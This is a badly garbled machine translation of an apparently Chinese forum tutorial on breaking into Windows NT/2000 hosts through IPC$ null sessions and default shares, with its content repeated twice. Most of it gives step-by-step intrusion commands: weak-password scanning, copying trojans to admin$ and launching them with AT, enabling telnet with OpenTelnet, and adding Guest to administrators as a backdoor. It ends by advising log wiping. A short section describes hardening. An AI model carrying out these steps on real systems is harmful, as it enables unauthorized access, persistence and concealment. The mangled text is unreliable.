The PC $ command detailed the article about IPC $ invading can be described as cow, and there is no shortage, and the attack step can even say that it has become a classic model, so no one is willing to take this. It has become a styled thing. Although I said, I personally think that these articles are not detailed. For the first time I contact IPC $ rookie, simple Rusp is not to answer their many confused (you just find a HACK forum to search for IPC I look at the existence of the doubts. I have written this twice that is equivalent to the solution. I want to make some easier confusion, it is easy to confuse the problem, let everyone don't always be in the same place! If you finish this Posts still have questions, please reply immediately!
II: IPC $ IPC $ (Internet Process Connection) is a shared "named pipe" resource (everyone saying this), is to make the name of the name and password can be obtained by verifying the username and password Permissions, use when managing computers and views computer shared resources. With IPC $, the connectors can even create an empty connection with the target host without the username and password (of course, the other machine must open IPC $ sharing, otherwise you can't connect), and use this empty connection, The connector can also get a list of users on the target host (but the responsible administrator will prohibit the export user list). We are always talking about IPC $ vulnerability IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, it is to facilitate administrator's remote management and open remote network login function, but also open the default sharing, ie all Logic disk (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $). All of these, the original intention is to facilitate the management of the administrator, but the original intention does not necessarily have a good job, some don't have the heart (what is intention? I don't know, the pronoun is one) will take advantage of IPC $, access sharing Resources, export users list, and use some dictionary tools to perform password probing, hoped to achieve higher permissions, thereby achieving non-marketed purposes.
Confusion: 1) IPC connection is a remote network login function unique in Windows NT and above, which is equivalent to Telnet in UNIX, because IPC $ features need to use a lot of DLL functions in Windows NT, so you can't be in Windows 9 Run in .x. That is to say, only NT / 2000 / XP can be established IPC $ connection, 98 / ME can't create IPC $ Connection (but some friends said to build an empty connection in 98, I don't know if it is true, but now 2003 Year, I suggest that 98 comrades change the system, 98 is not cool) 2) Even if it is empty connection, it can be established. If the other party closes IPC $ sharing, you still have no connection 3) is not to establish You can view each other's user list because the administrator can prohibit the export user list.
Three establishment IPC $ Connection in the HACK attack is like what is said above, even if you have established an empty connection, you can also get a lot of information (and this information is often essential), visit Part of sharing, if you can log in as a user with certain permissions, then you will get the appropriate permissions, obviously if you log in as an administrator, 嘿嘿, don't have to say more, what U Want, u can do !! (Basically, you can get the target information, manage the target process and service, upload the Trojan and run, if it is 2000 Server, you can also consider opening the terminal service convenient control. How? Enough!) But You shouldn't be happy too early, because the administrator's password is not so good, although there will be some silly administrators with empty password or a mentally password, but this is a few, and now it is not in the past, with the past People's safety awareness is increased, and the administrators are more careful. It will be harder and harder to get the administrator's password: (So your biggest possibility is to connect with minimal permissions or even no permissions, you will slowly It is found that IPC $ is not universal, even when the host does not turn on IPC $ sharing, you can't connect. So I think you don't want to invade IPC $ invading as an ultimate weapon, don't think it's a battle, it is like It is the passball before the football field, rarely has a fatal effect, but it is indispensable, I think this is the meaning of IPC $ connected in the Hack invasion.
Four IPC $ with empty connections, 139, 445 ports, the default sharing relationship The above relationship may be a problem with the rookie very confused, but most of the articles do not have a special statement, in fact, I understand is not very thorough, all Summary in communication with everyone. (A BBS with a good discussion) 1) 1) IPC $ with empty connections: No user name and password IPC $ connection is empty, once you The identity of a user or administrator (ie, IPC $ connection with a specific username and password), naturally can't be called empty connection. Many people may have to ask, since it can be connected, then I will open it later. Why didn't I expell the weak password, huh, huh, I mentioned before, when you log in in an empty connection, you don't have any permissions (very depressed), and you or administrators When you log in, you will have the corresponding permissions (who have permissions who don't want it, so I am old and old, don't be lazy) .2) IPC $ with 139,445 port: IPC $ connection can be remotely logged in and the default Shared access; while the 139 port is opened to indicate the application of the NetBIOS protocol, we can implement access to the shared file / printer via the 139, 445 (Win2000) port, so general, IPC $ connection is required to support 139 or 445 ports. 3) IPC $ and the default sharing default sharing is to make it easy for administrators remote management and the default open share (you can of course turn off it), that is, all logical disks (C $, D $, E $ ...) and system catalog Winnt Or Windows (admin $), we can implement access to these default sharing through the IPC $ connection (provided that the other party did not close these default sharing)
The five IPC $ Connection Failure The following five reasons are more common: 1) Your system is not NT or more * as a system; 2) The other party did not open IPC $ default sharing 3) The other party did not open 139 or 445 port (confusing Firewall shielding) 4) Your command input is incorrect (such as a space, etc.) 5) Username or password error (empty connection is of course, it doesn't matter), you can also analyze the cause according to the return number: Error number 5, refuse Access: It's very likely that the users you use are not administrator privileges. First improve the permissions; the error number 51, Windows can't find the network path: the network has problems; error number 53, no network path: IP address is incorrect; The target LanmanServer service is not launched; the target has a firewall (port filtering); error number 67, not finding the network name: Your LanmanWorkStation service is not started; the target deletes IPC $; error number 1219, the credentials provided with existing credentials Conflict: You have already established an IPC $ with the other party, please delete it. Error number 1326, unknown user name or error password: The reason is obvious; error number 1792, trying to log in, but network login service is not started: The target Netlogon service is not started. (This condition will appear in connection domain) Error number 2242, this user's password has expired: the target has an account policy, enforces the change in periodic requirements. Regarding IPC $, there is a more complex problem. In addition to the above reasons, there will be some other uncertain factors, and this person cannot be detailed, it depends on everyone to experience and experiment.
Six how to open the target IPC $ (this section is from related articles) First you need a shell that does not rely on IPC $, such as SQL CMD extension, telnet, Trojan, of course, this shell must be admin privileges, then you You can use the shell to execute the NET Share IPC $ to open the target IPC $. From above, IPC $ can use there much of use. Please confirm that the relevant services have been running. If you don't start it (don't know how to do it, please see the usage of the NET command), or if you don't work (such as a firewall, killing) It is recommended to give up.
Seven how to prevent IPC $ invading 1 Prohibit empty connection to enumerate (this * does not block the establishment of empty connections, leading from "Anatomy Win2000 under Empty Fair") First Running Regedit, find the following group [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / Control / LSA] Change the key value of Restrictanonymous = DWORD to: 00000001 (If set to 2, there are some problems that will happen, such as some Win services, problems, etc.) 2 Prohibit the default sharing 1) Locally shared resource operation - CMD-Enter Net Share2) Delete Sharing (One Enter One) NET Share IPC $ / DeleTeNet Share Admin $ / DeleTeNet Share C $ / DeleTeNet Share D $ / Delete (if there is e, f, ... can continue to delete) 3) Stop Server Service Net Stop Server / Y (Restart After the Server service will be reopened) 4) Modify the registry running -RegeditServer version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] to put autoshareserver (dword) The key value is changed to: 00000000. Pro version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShaRewks (DWORD) to: 00000000. If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value.
3 Permanently close IPC $ and Default Shared Related Services: LanmanServer, Server Server Service Control Panel - Administrative Tool - Services - Find Server Services (right-click) - Properties - General - Startup Type - Disabled
4 Install the firewall (check related settings), or port filtering (filtered out 139, 445, etc.), or use the new version of the optimization master
5 Setting complex password to prevent passwords of IPC $
Eight-related commands 1) Create an empty connection: NET USE // IP / IPC $ "" / user: "" (must pay attention to: This line of commands contain 3 spaces)
2) Establish a non-empty connection: NET USE // IP / IPC $ "User Name" / User: "Password" (same as 3 spaces)
3) Mapping Default Sharing: NET USE Z: // IP / C $ "Password" / user: "User Name" (you can map the other party C disk to your own Z disk, other disk classes) If you have established with your goals IPC $, you can directly use IP drive letter $ access, specific command NET USE Z: // IP / C $
4) Delete an IPC $ Connection NET USE // IP / IPC $ / DEL
5) Delete the shared mapping NET USE C: / DEL to delete the mapped C disk, other disk classes push NET USE * / DEL delete all, there will be prompt requirements to press Y confirmation
The invasion mode is too classic, and most of the IPC tutorials have introduced. I will take it to the original creator! (I don't know which seniors are you)
11. C: /> NET Use //127.0.0.1/IPC $ "Password" / user: "User Name" generally uses streamlights to get, administrator accounts and passwords by scanning the weak password .2. C: /> Copy Srv.exe //127.0.0.1/admin $ Copy Srv.exe first, there is a Tools directory in the stream ($ refers to the admin user's C: / Winnt / System32 /, you can also use C $, D $, means the C disk and the D disk, see where you want to copy it). 3. C: /> Net Time //127.0.0.1 Investigation Time, found 127.0.0.1 The current time of 127.0.0.1 is 2004/6/15 11:00 am, and the command successfully completed. 4. C: /> AT //127.0.0.1 11:05 srv.exe Start SRV.EXE Bar 5. C: /> Net Time //127.0.0.1 ■ No time? If the current time of 127.0.0.1 is 2004/6/15 11:05 am, then prepare to start the following command. 6. C: /> Telnet 127.0.0.1 99 This will use the telnet command, pay attention to the port is 99. The Telnet default is the 23-port, but we use SRV to create a 99-port for us in the other party. Although we can go on Telnet, SRV is a one-time, and then activated next time! So we intend to build a Telnet service! This is to use NTLM 7.c: /> Copy ntlm.exe //127.0.0.1/admin $ Add NTLM.exe to the host with a copy command (NTLM.exe is also in the "Dream" Tools directory) . 8. C: / Winnt / System32> NTLM Enter NTLM Start (here C: / Winnt / System32> refers to the other party, running NTLM actually let this program run on the other computer). When "DONE" appears, it will be normal. Then use "Net Start Telnet" to open the Telnet service!
9. Telnet 127.0.0.1, then enter the username and password to enter the other party, * is as simple as it is on DOS *! (And then do you want to do? What do you want to do, haha?
In order to prevent everyone, we will activate the Guest to the management group 10. C: /> Net user guest / active: YES activates the other party's guest users
11. C: /> Net user guest 1234 change the password of the guest to 1234, or the password you want to set
12. C: /> Net localgroup administrators Guest / add Least into Administrator (if the administrator password change, the guest account has not changed, the next time we can use Guest to access this computer again)
IPC $ detailed explanation
The article about IPC $ invading can be described as cow, and there is no shortage, and the attack step can even say that it has become a classic model, so no one is willing to take this into set out. But though said, but I personally think that these articles are not detailed. For the first time you have exposed to IPC $, you can't answer their confused. (You just find a HACK forum to search. IPC $, see how much the existence is. So I refer to some information, tutorials and forum posts on the Internet, write this summary of the nature, I want to make some easier confusion, easy to confuse the question, let everyone don't always be in the same place! Note: Discussion this article Both of the Win NT / 2000 in the WIN NT / 2000 environment, Win98 will not be discussed in this discussion, and given that Win XP has improved on security settings, individual * does not apply, there is an opportunity to discuss separately. What is IPC $
IPC $ (Internet Process Connection) is a resource shared "named pipe". It is a named pipe that opens inter-process communication, and connects the two sides to establish a secure channel by providing trusted username and password. Encrypted data exchange, thereby enabling access to remote computers. IPC $ is a new feature of NT / 2000, which has a feature that only one connection is allowed between two IPs within the same time. NT / 2000 also opens the default sharing while providing IPC $ feature, all logical sharing (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $) shared. All of these, Microsoft's original intention is to facilitate administrator management, but in interested in unintentional, there is a decrease in system security. Usually we can always hear someone who is saying IPC $ vulnerability, IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, I think someone says this, must refer to Microsoft's own 'back door': empty A null session. So what is empty conversation?
Three is an empty conversation
Before introducing empty sessions, we need to understand how a security meeting is established. In Windows NT 4.0, the Challenge Response Agreement is used to establish a session with the remote machine. The establishment of a successful session will become a secure tunnel, establishing the two parties through it through it, the process of the process is as follows: 1) Session requestor (customer) Send a packet to the session receiver (server), requiring the establishment of the security tunnel; 2) The server generates a random 64-bit number (implementation challenge) transfer back to customers; 3) The customer gets the 64-bit number generated by the server The password that tries to establish a session, returns the result to the server (implement response); 4) After receiving the response, send to local security verification (LSA), LSA verifies the response by using the user's correct password to confirm the request Identity. If the requester's account is the local account of the server, verify local; if the requested account is a domain account, the response is transmitted to the domain controller to verify. When the response to the challenge is verified correctly, an access token is generated, and then transmitted to the customer. Customers use this access token to connect to resources on the server until the suggested session is terminated. The above is a rough process established by a security conference. What is the empty session?
The empty board is a session established with the server without trust (ie, the user name and password is not provided), but according to the Win2000 access control model, the establishment of the empty space will also provide a token, but the empty session is in the process of establishing There is no authentication of user information, so this token does not contain user information, so this session does not allow the system to send encrypted information, but this does not mean that there is no security identifier SID in the token of the empty session (it identifies User and locale), for an empty box, the SID of the token provided by the LSA is S-1-5-7, this is the SID of the empty session, the username is: Anonymous Logon (this username is available in the user list As seen in the SAM database, it is not found in the SAM database), this access token contains the following group: Everyone Network will be authorized to access the above two in the security policy limit. The group has the right to access all information. So what can I do if I build an empty session? What can I do in the four empty space?
For NT, in the default security settings, you can list the users and shares on the target host, access the share of Everyone privilege, and access the small part of the registry, and there is no great use value; for the 2000 role, Because of the default, only administrators and backups in the Windows 2000 and later, the rule is entitled to the registry from the network, and it is not convenient to achieve it. From these we can see that this kind of non-credit session does not use, but from a complete IPC $ invading, empty space is an indispensable springboard because we can get a list from it, this is An older hacker is already enough. The following is the specific command that can be used in the empty session:
1 First, let's create an empty box (IPC $) command: Net USE // IP / IPC $ "" / user: "Note: The above command includes four spaces, NET and USE have a space After the use of the USE, one space around the password.
2 View Remote Host Sharing Resource Command: Net View // IP Interpretation: After establishing an empty connection, use this command to view the shared resource of the remote host, if it is shared, you can get the following similar results: on // * Shared resource resource shared name Type Type Note
-------------------------------------------------- --------- Netlogon Disk Logon Server Share Sysvol Disk Logon Server Share command successfully completed.
3 View the current time command of the remote host: NET Time // IP Interpretation: Use this command to get a remote host's current time.
4 Get the NetBIOS user name list (need to open your own NBT) nbtstat -a ip with this command to get a NetBIOS user name list (require your NetBIOS support), return to the following results:
Node ipaddress: [*. *. *. *] Scope id: []
Netbios Remote Machine Name Table
Name Type Status -------------------------------------------- Server < 00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H <1C> GROUP Registered SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI- H <1D> UNIQUE Registered ..__ msbrowse __. <01> Group registered inet ~ services <1c> group register is ~ server ... <00> unique registeredmac address = 00-50-8b-9a-2d-37
The above is what we often use empty sessions, it seems to have a lot of things, but you should pay attention to it: Establish an IPC $ Connection * Refrigeration will leave a record in EventLog, whether you are successful. Ok, then let's take a look at the ports used by IPC $?
Port used by IPC $
First let's know some basic knowledge: 1 SMBSERVER Message Block, Windows protocol, service for file printing sharing; 2 NBTNetBIOS over TCP / IP) Using 137 (UDP) 138 (UDP) 139 (TCP) port to implement TCP / The NetBIOS network interconnection of the IP protocol. 3 In WindowsNT, SMB is implemented based on NBT, and in Windows 2000, SMB can be implemented directly through a 445 port in addition to NBT implementation.
With these basic knowledge, we can further discuss access to the network sharing to the port:
For Win2000 clients: 1 If the client will attempt to access 139 and 445 port at the same time if the server is allowed to connect the server, if the 445 port has a response, then send the RST package to the 139 port disconnected, with 455 The port is session, and when the 445 port does not respond, only the 139 port is used. If the two ports do not respond, the session failed; 2 If the server is connected to the server, then the client will try to access 445 ports. If the 445 port is no response, the session fails. It can be seen that the Win 2000 after the NBT is banned will fail.
For the Win2000 server side: 1 If NBT is allowed, the UDP port 137, 138, TCP ports 139, 445 will be open; 2 If NBT is prohibited, only 445 port is open.
Our established IPC $ session is equally complied with the above principles. Obviously, if the remote server does not listen to 139 or 445 port, IPC $ session cannot be created.
Six IPC $ Connection in Hack Attack
As mentioned above, even if you have established an empty connection, you can also get a lot of information (and this information is often essential), if you can identify a certain permissions If you log in, then you will get the appropriate permissions, obviously if you log in as an administrator, hey, then you can't, basically you want. But you don't want to be too early, because the administrator's password is not so good, although there will be some careful administrators have a weak pass, but this is a few, and now it is not previously, with people's safety awareness Increased, the administrators also be more careful, get the administrator's password will be more difficult, so your biggest possibility is to connect with minimal permissions or even no permissions, and even do not open IPC $ sharing in the host. When you can't connect, you will slowly discover IPC $ connection is not universal, so don't expect each connection to succeed, it is unrealistic. Is it some discouraged? It is also not, the key is that we have to appear mentality, don't treat IPC $ invading as an ultimate weapon, don't think it's a battle, it is just a kind of intrusion method, you may use it to kill, and there are Maybe it is nothing, these are normal, in the world of hackers, not every road to lead to Rome, but there is always a road to travel to Rome, patient look! Common reasons for seven IPC $ connection failure
Here are some common causes of IPC $ connection failure:
1 IPC connection is a unique feature in Windows NT and above, because it needs to use a lot of DLL functions in Windows NT, so you can't run in the Windows 9.x / ME system, that is, only NT / 2000 / XP can Establish an IPC $ connected to each other, 98 / ME cannot establish an IPC $ connection;
2 If you want to successfully create an IPC $ connection, you need to open IPC $ sharing, even if it is empty connection, if the other party closes IPC $ sharing, you will build a failure;
3 You have not launched the LanmanWorkStation service, it provides network links and communication, without it you can't initiate a connection request (display name: Workstation);
4 The other party did not start the LanmanServer service, it provides RPC support, file, print, and named pipe sharing, IPC $ relies on this service, without its remote host will not be able to respond to your connection request (display name: server);
5 The other party did not start Netlogon, which supports the login of the computer PASS-THROUGH account on the network;
6 The other side banned NBT (ie, no 139 port);
7 other firewalls shielded 139 and 445 ports;
8 Your username or password error (obvious empty session excludes such an error);
9 Command Enter an error: Map may be more or less, when the user name and password do not contain spaces, the double quotes can be omitted, if the password is empty, you can enter two quotes directly ""
10 If the other party restarts the computer in the case where the connection has been established, the IPC $ connection will be automatically disconnected and the connection is required.
In addition, you can also analyze the reason according to the returned error number: Error number 5, refuse to access: It is likely that the users you use are not administrator privileges, first improve the permissions; the error number 51, Windows cannot find the network path: network has problems; Error number 53, no network path: IP address error; the target is not boot; the target LanmanServer service is not started; the target has a firewall (port filtering); error number 67, find the network name: Your LanmanWorkStation service is not started or target Deleted IPC $; error number 1219, provided credentials and existing credentials set: You have established an IPC $ with each other, please delete again; error number 1326, unknown user name or error password: reason is obvious ; Error number 1792, trying to log in, but the network login service is not started: the target NetLogon service is not started; the error number 2242, this user's password has expired: the target has an account policy, enforces the regular requirements to change the password. The reason for the failure of the eight copy file
Some friends have successfully established IPC $ connection, but when Copy has encountered such a trouble, it cannot be copied, then what are the common reasons for replication failure?
1 Blind copying This type of error occurs most, accounting for more than 50%. Many friends don't even know if the other party has a shared folder, which is blindly replicated, and the result is a very depressed and depressed. So I suggested that you must use the NET View // ip command before conducting a copy, don't think that IPC $ connection has been successfully established, you must have a shared folder.
2 Default Sharing Judgment Errors This type of error is also often crossed, mainly two small aspects:
1) Error thinking to establish an IPC $ connected to the default sharing, thus immediately share replication files to Admin $, resulting in the default sharing files such as Admin, and resume replication. IPC $ Connection Success You can only explain the other party to open IPC $ sharing, IPC $ sharing and default sharing are two yards, IPC $ sharing is a naming pipe, not which actual folder, and default sharing is not the necessary condition for IPC $ ;
2) Because Net View // IP cannot display the default share (because the default shared belt $), I cannot judge whether the other party has turned on the default share, so if the other party does not turn on the default sharing, then all to the default sharing * Can't succeed; (but most scanning software can sweep the default shared directory while sweeping the password, avoiding such errors)
3 User privileges are not enough, including four situations: 1) When copying to all shared (default sharing and normal sharing), most cases are not enough, 2) When copying the default, you must have administrator privileges; 3 When copying to normal sharing, there must be corresponding privileges (ie, the other party's prior set access rights); 4) The other party can ban external access sharing by firewall or security software;
It will also be necessary to explain: Don't think that Administrator is an administrator, and the administrator name can be changed.
4 Kill the firewall or in the LAN may be a successful copy * is successful, but when the remote is running, the firewall is killed, causing the file; also possible you to copy the Trojan to the host in the LAN, causing connectivity failure. Therefore, it is recommended that you have to copy it, otherwise you will give up. Oh, everyone knows that IPC $ is connected in the actual *, there will be a torrent problem during the process. The above summarizes is just some common mistakes. If you haven't said, you can only let yourself understand.
IX How to open the target IPC $ sharing and other sharing
The target of IPC $ is not easy to open, otherwise it will be disrupted in the world. You need a shell of admin privilege, such as Telnet, Trojan, etc., then execute NET Share IPC $ to open the target's IPC $, with NET Share IPC $ / DEL to close the sharing. If you want to open a shared folder, you can use Net Share Baby = C: /, this will open its C on the shared name.
Ten some commands that need shells can complete
Seeing a lot of tutorials written in this regard, some of the need for Shell can complete the command, which is a misleading effect on the IPC $ connection. Then I summarize the command that needs to be completed at the shell:
1 Establish a user to the remote host, activate the user, modify the user password, and join the management group * If you need to complete it under the shell;
2 Open the IPC $ sharing of the remote host, the default sharing, the ordinary shared * is done under the shell;
3 Run / Close the service of the remote host, you need to do it under the shell;
4 Start / kill the process of the remote host, you also need to do it under the shell.
The relevant commands that may be used in the 11 invasion
Please note that the command applies to the local or remote. If applicable to the local, you can only perform it to the remote host after you get the Shell for the remote host.
1 Create an empty connection: NET USE // IP / IPC $ "" / user: ""
2 Establish a non-empty connection: NET USE // IP / IPC $ "PSW" / user: "Account"
3 View remote host shared resources (but not see default sharing) NET View // ip
4 View local host shared resources (you can see local default sharing) NET Share
5 User name list of remote hosts NBTSTAT -A IP
6 Get a list of users from the local host Net User
7 View the current time of the remote host NET TIME / / IP
8 Display local host current service NET Start
9 Start / close Local Service NET Start Service Name / Y Net STOP Service Name / Y
10 Mapping Remote Sharing: NET USE Z: // IP / BABY This command will share the shared resource named Baby to z-disc
11 Delete Shared Map NET USE C: / DEL Deletes the mapped C disk, other disk push net use * / del / y delete all
12 Copy the file COPY / PV /SRV.EXE // IP / Shared Directory name, such as: copy ccbirds.exe //*.*.*.*C to copy the file in the current directory to the other C drive
13 Remote Add Plan Task AT // IP Time Program Name, such as: AT //127.0.0.0 11:00 Love.exe Note: Time to use 24 hours; in the system default search path (such as system32 /) Do not use the path , Otherwise you must add a path
14 Telnet to open a remote host here to use a small program: Opentelnet.exe, all major download sites, but also need to meet four requirements: 1) Target open IPC $ sharing 2) You have to have administrator passwords and Account 3) Target Open RemoteRegistry service, users are valid for WIN2K / XP, NT untested command format: OpenTelnet.exe // Server Account PSW NTLM authentication Port Examples are as follows: c: /> Opentelnet. Exe //.*.*.** administrator "" 1 90
15 Activate users / joined administrators group 1 Net uesr account / activ: Yes 2 Net localgroup administrators account / add
16 Tight the Telnet of the remote host also require a small program: resumeTelnet.exe command format: ResumeTelNet.exe // Server Account PSW Examples are as follows: c: /> resumetelnet.exe //*.*.* Administrator ""
17 Delete a established IPC $ Connection NET USE // IP / IPC $ / DEL
(This tutorial does not update regularly, want to get the latest version, please visit the official website: Cuisine Bird Community Original http://ccbirds.yeah.net)
Twelve IPC $ intact intrusion steps
In fact, the invasion steps are different from personally hobby. I will talk about common, huh, huh, deceive!
1 Search with the scanning software, the host, such as stream, sss, x-scan, etc., follow you, then lock the target, if you sweep the password of the administrator privilege, you can make the following steps, suppose you now Get the password of Administrator is empty
2 At this point you have two ways to choose: either open the telnet (command line), or give it a trembie (graphical interface), then let's take the Telnet road.
3 The command to open Telnet is not forgotten, use Opentelnet this small program C: /> opentelnet.exe //192.168.21.* Administrator "" 1 90 If you return the following information ********* ***************************************************** Remote Telnet Configure, B Refdom email: refDom@263.net opentelnet.exe
Usagepentelnet.exe // server username password ntlmauthor telnetport ***************************************************** ********************** Connecting //192.168.21.*...suCcessFully!
Notice !!!!!! The telnet service default setting: ntlmauthor = 2 telnetport = 23
Starting Telnet Service ... Telnet Service is Started Success! Telnet Service is Running!
BINGLE !!! Yeah !! Telnet Port is 90. You CAN TRY: "Telnet IP 90", To Connect The Server! Disconnecting Server ... SuccessFully! * Description You have already opened a Telnet of a port 90. 4 Now we telnet on telnet 192.168.21. * 90 If success, you will get a shell of the remote host. At this point you can control your broiler like your machine, do you do something? Add the Guest to join the management group, even if you leave a back door.
5 C: YES * Activated guest users, and possibly people's guests will try to live, you can use Net user guest to see that its account enabled is Yes or no
6 c: /> net user guest 1234 * change the password of the guest to 1234, or change your favorite password
7 c: /> net localgroup administrators guest / add * Change the guest into Administrator, so that even if the administrator changes his password, we can also log in with Guest, but also remind you because of the settings of the security policy. It is possible to prohibit remote access of Guest and other accounts, huh, if this is true, then our back door is also white, may God bless everyone.
8 Ok, now let's take another road, give it a Trojan play.
9 First, let's build IPC $ Connection C: /> Net Use //192.168.21.*/ipc $ "" / user: administrator
10 Since you want to upload something, you must first know what shared it has been shared C: /> Net View //192.168.21. * Shared resource resource shared name type Terms
-------------------------------------------------- -------- C Disk Disk command successfully completed. * Ok, we see the other party share C, D two disks, we can copy files from any disk. Award again, because the default sharing cannot be seen with the NET View command, so we cannot judge whether the other party opens the default sharing.
11 C: /> Copy Love.exe //192.168.21.* Cable 1 file * Use this command You can pass the Trojan client love.exe to the other party's C disk, of course, if you can copy it The system folder is the best, it is not easy to discover
12 Before running the Trojan, let's take a look at it now Net Time ///192.168.21.* //192.168.21. The current time is 2003/8/22 at 11:00 in the morning, the command successfully completed
13 Now we run it with AT, but the other party must open the Task Scheduler service (allowing the program to run in the specified time), otherwise it will not work C: /> at //192.168.21.* 11:02 C: / love .exe added a job, its job ID = 1
14 The rest is waiting, wait 11:02, you can use the control terminal to connect, if you successfully use the graphical interface to control the remote host, if the connection fails, it may be in the local area network, Maybe the program is killed by the firewall, it may be offline (not so smart), no matter what case, you have to give up.
Well, ok, two basic methods are said. If you have a light car, you can use a more efficient routine, such as using a CA clone guest, use psexec, use the command: psexec // tergetip -u user -p paswd cmd.exe to get the shell, etc. These are all available, follow you. But don't forget to clean your logs, you can use the Elsave.exe of the Gongge.
